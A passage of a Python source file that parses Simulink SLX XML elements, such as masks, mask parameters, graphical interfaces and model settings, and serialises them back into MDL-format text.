return EditorSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class EngineSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<EngineSettings') and strval.endswith('</EngineSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'EngineSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return EngineSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class EnumStrPairs(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<EnumStrPairs') and strval.endswith('</EnumStrPairs>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'EnumStrPairs' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return EnumStrPairs(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'EnumStrPairs {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ExternalFileReference(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ExternalFileReference') and strval.endswith('</ExternalFileReference>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ExternalFileReference' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ExternalFileReference(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'ExternalFileReference {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ExternalMode(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ExternalMode') and strval.endswith('</ExternalMode>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ExternalMode' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ExternalMode(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class Field(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Field') and strval.endswith('</Field>')
super().__init__(strval, parent_xml)
self.name_attr = None
self.class_attr = None
for x in self.attrs:
if x.name == 'Name':
self.name_attr = x
if x.name == 'Class':
self.class_attr = x
@classmethod
def from_XmlElement(cls, xml_element):
return Field(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
quoted = f'{self.name_attr.value} "{self.content}"' # default
unquoted = f'{self.name_attr.value} {self.content}' # special: content already bracketed
boxed = f'{self.name_attr.value} [{self.content}]' # special: brackets added here
if self.class_attr and self.class_attr.value in ['double']:
# 'double' fields are emitted unquoted; ensure the value ends up bracketed
if self.content.startswith('[') and self.content.endswith(']'):
return unquoted
return boxed
return quoted
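# Illustrative examples of the three output forms above (the Field names and contents
# are hypothetical, not taken from a real model):
# Name="Gain", Class="double", content="3" -> Gain [3] (boxed)
# Name="Gain", Class="double", content="[1 2 3]" -> Gain [1 2 3] (unquoted)
# Name="Label", no Class attr, content="abc" -> Label "abc" (quoted)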
class FilePath(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<FilePath') and strval.endswith('</FilePath>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return FilePath(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'FilePath "{self.content}"'
class FunctionConnector(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<FunctionConnector') and strval.endswith('</FunctionConnector>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'FunctionConnector' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return FunctionConnector(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'FunctionConnector {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class FunctionPort(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<FunctionPort') and strval.endswith('</FunctionPort>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'FunctionPort' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return FunctionPort(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'FunctionPort {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class GraphicalInterface(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<GraphicalInterface') and strval.endswith('</GraphicalInterface>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.externalFileReferences = []
self.modelReferences = []
self.testPointedSignals = []
self.inports = []
self.outports = []
self.requireFunctions = []
self.subsystemReferences = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ExternalFileReference':
self.externalFileReferences.append(ExternalFileReference.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ModelReference':
self.modelReferences.append(ModelReference.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'TestPointedSignal':
self.testPointedSignals.append(TestPointedSignal.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Inport':
self.inports.append(Inport.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Outport':
self.outports.append(Outport.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'RequireFunction':
self.requireFunctions.append(RequireFunction.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'SubsystemReference':
self.subsystemReferences.append(SubsystemReference.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'GraphicalInterface' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return GraphicalInterface(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'GraphicalInterface {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.externalFileReferences:
str_ += f'{x.strmdl}\n'
for x in self.modelReferences:
str_ += f'{x.strmdl}\n'
for x in self.testPointedSignals:
str_ += f'{x.strmdl}\n'
for x in self.inports:
str_ += f'{x.strmdl}\n'
for x in self.outports:
str_ += f'{x.strmdl}\n'
for x in self.requireFunctions:
str_ += f'{x.strmdl}\n'
for x in self.subsystemReferences:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Help(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Help') and strval.endswith('</Help>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Help(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Help "{self.content}"'
class Initialization(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Initialization') and strval.endswith('</Initialization>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Initialization(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Initialization "{self.content}"'
class Inport(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Inport') and strval.endswith('</Inport>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Inport' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Inport(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Inport {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class InstanceData(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<InstanceData') and strval.endswith('</InstanceData>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = [] # found in matlab-central/HEV_Battery_Lib.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'InstanceData' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return InstanceData(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class LinkData(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<LinkData') and strval.endswith('</LinkData>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.dialogParameterss = [] # found in matlab-central/Dual_Clutch_Trans.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DialogParameters':
self.dialogParameterss.append(DialogParameters.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'LinkData' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return LinkData(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'LinkData {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.dialogParameterss:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Line(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Line') and strval.endswith('</Line>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.branches = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Branch':
self.branches.append(Branch.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Line' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Line(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Line {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.branches:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class LineDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<LineDefaults') and strval.endswith('</LineDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'LineDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return LineDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'LineDefaults {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class List(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<List') and strval.endswith('</List>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'List' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return List(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'List {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class LogicAnalyzerPlugin(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<LogicAnalyzerPlugin') and strval.endswith('</LogicAnalyzerPlugin>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'LogicAnalyzerPlugin' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return LogicAnalyzerPlugin(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class Mask(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Mask') and strval.endswith('</Mask>')
super().__init__(strval, parent_xml)
self.object_idmdl = Utils.object_idmdl_by_xml_element(self)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.displays = []
self.types = []
self.maskParameters = []
self.dialogControls = []
self.descriptions = []
self.initializations = []
self.helps = []
self.capabilities = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Display':
self.displays.append(Display.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Type':
self.types.append(Type.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MaskParameter':
self.maskParameters.append(MaskParameter.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DialogControl':
self.dialogControls.append(DialogControl.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Description':
self.descriptions.append(Description.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Initialization':
self.initializations.append(Initialization.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Capabilities':
self.capabilities.append(Capabilities.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Help':
self.helps.append(Help.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ImageFile':
# the corresponding information does not appear in the mdl file
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Mask' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Mask(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Object {\n' # special
str_ += f'$PropName "MaskObject"\n'
str_ += f'$ObjectID {self.object_idmdl}\n' # TODO: figure out what ObjectID is
str_ += f'$ClassName "Simulink.Mask"\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.displays:
str_ += f'{x.strmdl}\n'
for x in self.types:
str_ += f'{x.strmdl}\n'
if len(self.maskParameters) > 1:
str_ += 'Array {\n'
str_ += 'Type "Simulink.MaskParameter"\n'
# PropName attribute is mandatory.
# Notice that there is no leading $
str_ += 'PropName "Parameters"\n'
str_ += f'Dimension {len(self.maskParameters)}\n'
for x in self.maskParameters:
str_ += f'{x.strmdl(is_array_element=True)}\n'
str_ += '}\n'
else:
for x in self.maskParameters:
str_ += f'{x.strmdl(is_array_element=False)}\n'
if len(self.dialogControls) > 1:
str_ += 'Array {\n'
str_ += f'Type "{self.dialogControls[0].array_type_or_object_className()}"\n'
# PropName attribute is mandatory.
# Notice that there is no leading $
str_ += 'PropName "DialogControls"\n'
str_ += f'Dimension {len(self.dialogControls)}\n'
for x in self.dialogControls:
str_ += f'{x.strmdl(is_array_element=True)}\n'
str_ += '}\n'
else:
for x in self.dialogControls:
str_ += f'{x.strmdl(is_array_element=False)}\n'
for x in self.descriptions:
str_ += f'{x.strmdl}\n'
for x in self.initializations:
str_ += f'{x.strmdl}\n'
for x in self.helps:
str_ += f'{x.strmdl}\n'
for x in self.capabilities:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class MaskDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<MaskDefaults') and strval.endswith('</MaskDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.displays = []
self.maskParameters = []
self.dialogControls = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Display':
self.displays.append(Display.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MaskParameter':
self.maskParameters.append(MaskParameter.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DialogControl':
self.dialogControls.append(DialogControl.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'MaskDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return MaskDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'MaskDefaults {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.displays:
str_ += f'{x.strmdl}\n'
# although <MaskDefaults> contains <DialogControl>, the information
# about the contained <DialogControl> and its children (<ControlOptions>) is
# not present in the mdl file. So, it is not included in the mdl string
# for x in self.dialogControls:
# str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
# special: appears outside the parent
for x in self.maskParameters:
str_ += f'{x.strmdl(is_array_element=False)}\n'
return str_
class MaskParameter(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<MaskParameter') and strval.endswith('</MaskParameter>')
super().__init__(strval, parent_xml)
self.object_idmdl = Utils.object_idmdl_by_xml_element(self)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.prompts = []
self.values = []
self.typeOptions = []
self.callbacks = []
self.ranges = []
self.tabNames = [] # first found in corpus/github/Lib_Cntrl_FirstOrderActuator_TMATS.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Prompt':
self.prompts.append(Prompt.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Value':
self.values.append(Value.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'TypeOptions':
self.typeOptions.append(TypeOptions.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Callback':
self.callbacks.append(Callback.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Range':
self.ranges.append(Range.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'TabName':
self.tabNames.append(TabName.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'MaskParameter' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return MaskParameter(xml_element.strval, xml_element.parent_xml)
def strmdl(self, is_array_element):
"""
Args:
is_array_element (bool): True if the returned str is to be wrapped inside Array{}, else False
"""
# special
if self.parent_xml.tag == 'MaskDefaults': # see automotive/sldemo_autotrans
element_name = 'MaskParameterDefaults'
elif self.parent_xml.tag == 'Mask': # see automotive/sldemo_autotrans
element_name = 'Object'
else:
raise Exception(f"Element name for <MaskParameter> not decided for parent tag '{self.parent_xml.tag}'")
str_ = f'{element_name} {{\n'
# OBSERVATION: If multiple <MaskParameter> are contained in a parent tag (e.g. <Mask>),
# they are wrapped in Array{}.
#
# Each <MaskParameter> becomes an Object {} in mdl, containing $ObjectID, $PropName, and
# $ClassName.
#
# When they are wrapped in Array{}, in original mdl files (generated by Simulink):
# - $PropName is moved out (it becomes a MANDATORY attribute of the Array and is renamed
# to PropName, i.e. no leading $)
# - $ClassName is removed. (THIS IS DIFFERENT IN <DialogControl>.)
# - $ObjectID remains the same.
#
# Although keeping $PropName and $ClassName inside these wrapped Object{}s does no harm,
# we have chosen to remove them, matching the mdl files produced by Simulink.
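# Illustrative sketch (names and values are hypothetical): unlike <DialogControl>, the
# wrapped Object{}s here carry no $ClassName:
#
# Array {
# Type "Simulink.MaskParameter"
# PropName "Parameters"
# Dimension 2
# Object {
# $ObjectID 7
# Name "gain"
# Value "1"
# }
# ...
# }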
if element_name == 'Object':
str_ += f'$ObjectID {self.object_idmdl}\n' # TODO: figure out what ObjectID is
if not is_array_element:
str_ += f'$PropName "Parameters"\n'
str_ += f'$ClassName "Simulink.MaskParameter"\n'
# TODO: mdl contains 'Prompt'. What is it? (see dma/ex_modeling_simple_system)
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.prompts:
str_ += f'{x.strmdl}\n'
# special
for x in self.values:
str_ += f'{x.strmdl}\n'
# special: inferred from corpus/matlab-central/Link_A.slx
# Even if 'Value' does not appear in attributes or inner tags of <MaskParameter>,
# the corresponding mdl format still has 'Value' (set to "").
if not self.values: # if empty
for x in self.attrs:
if x.name == 'Value':
break
else: # none of the attributes has name 'Value'
str_ += f'Value ""\n'
for x in self.typeOptions:
str_ += f'{x.strmdl}\n'
for x in self.callbacks:
str_ += f'{x.strmdl}\n'
for x in self.ranges:
str_ += f'{x.strmdl}\n'
for x in self.tabNames:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class MaskParameterDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<MaskParameterDefaults') and strval.endswith('</MaskParameterDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'MaskParameterDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return MaskParameterDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'MaskParameterDefaults {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class MATStruct(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<MATStruct') and strval.endswith('</MATStruct>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.fields = []
self.arrays = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Field':
self.fields.append(Field.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'MATStruct' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return MATStruct(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'MATStruct {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.fields:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ModelOrLibraryOrSubsystem(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert (strval.startswith('<Model') and strval.endswith('</Model>')) or (strval.startswith('<Library') and strval.endswith('</Library>')) or (strval.startswith('<Subsystem') and strval.endswith('</Subsystem>'))
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.configManagerSettings = []
self.editorSettings = []
self.simulationSettings = []
self.externalModes = []
self.modelReferenceSettings = []
self.concurrentExecutionSettings = []
self.systems = []
self.diagnosticSuppressors = []
self.logicAnalyzerPlugins = []
self.notesPlugins = []
self.sLCCPlugins = []
self.webScopes_FoundationPlugins = []
self.arrays = []
self.graphicalInterfaces = []
self.userParameters = []
self.modelWorkspaces = []
self.objects = []
self.windowsInfos = []
self.configSets = []
self.blockDiagramDefaults = []
self.verifications = [] # found in matlab-central/Baro_Library.slx
self.configurationSets = [] # found in matlab-central/Baro_Library.slx
self.systemDefaultss = [] # found in matlab-central/Baro_Library.slx
self.blockDefaultss = [] # found in matlab-central/Baro_Library.slx
self.annotationDefaultss = [] # found in matlab-central/Baro_Library.slx
self.lineDefaultss = [] # found in matlab-central/Baro_Library.slx
self.maskDefaultss = [] # found in matlab-central/Baro_Library.slx
self.maskParameterDefaultss = [] # found in matlab-central/Baro_Library.slx
self.blockParameterDefaultss = [] # found in matlab-central/Baro_Library.slx
self.engineSettingss = [] # found in matlab-central/Assembly_Quadrotor.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ConfigManagerSettings':
self.configManagerSettings.append(ConfigManagerSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'EditorSettings':
self.editorSettings.append(EditorSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'SimulationSettings':
self.simulationSettings.append(SimulationSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ExternalMode':
self.externalModes.append(ExternalMode.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ModelReferenceSettings':
self.modelReferenceSettings.append(ModelReferenceSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ConcurrentExecutionSettings':
self.concurrentExecutionSettings.append(ConcurrentExecutionSettings.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'System':
self.systems.append(System.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'DiagnosticSuppressor':
self.diagnosticSuppressors.append(DiagnosticSuppressor.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'LogicAnalyzerPlugin':
self.logicAnalyzerPlugins.append(LogicAnalyzerPlugin.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'NotesPlugin':
self.notesPlugins.append(NotesPlugin.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'SLCCPlugin':
self.sLCCPlugins.append(SLCCPluginPlugin.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'WebScopes_FoundationPlugin':
self.webScopes_FoundationPlugins.append(WebScopes_FoundationPlugin.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'GraphicalInterface':
self.graphicalInterfaces.append(GraphicalInterface.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'UserParameters':
self.userParameters.append(UserParameters.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ModelWorkspace':
